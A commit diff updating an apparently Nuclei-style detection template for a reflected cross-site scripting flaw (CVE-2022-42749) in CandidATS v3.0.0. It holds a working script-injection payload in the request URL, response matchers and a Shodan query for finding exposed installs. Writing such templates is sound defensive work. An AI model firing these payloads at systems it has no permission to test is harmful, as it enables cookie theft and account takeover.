Update CVE-2022-42749.yaml
parent
b85e2c1eb7
commit
5a7535076a
|
@ -3,26 +3,37 @@ id: CVE-2022-42749
|
||||||
info:
|
info:
|
||||||
name: CandidATS v3.0.0 - Cross Site Scripting.
|
name: CandidATS v3.0.0 - Cross Site Scripting.
|
||||||
author: arafatansari
|
author: arafatansari
|
||||||
severity: Medium
|
severity: medium
|
||||||
description: CandidATS v3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.
|
description: |
|
||||||
|
CandidATS v3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.
|
||||||
reference:
|
reference:
|
||||||
- https://fluidattacks.com/advisories/modestep/
|
- https://fluidattacks.com/advisories/modestep/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-42749
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2022-42749
|
||||||
metadata:
|
metadata:
|
||||||
shodan-query: http.html:"CandidATS"
|
|
||||||
verified: true
|
verified: true
|
||||||
tags: xss,cve,2022
|
shodan-query: http.html:"CandidATS"
|
||||||
|
tags: cve,cve2022,candidats,xss,
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&isPopup=0'
|
- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '<script>alert(document.cookie)</script>'
|
- '<script>alert(document.domain)</script>'
|
||||||
|
- 'candidat'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
condition: and
|
condition: and
|
||||||
- type: status
|
- type: status
|
||||||
|
|
Loading…
Reference in New Issue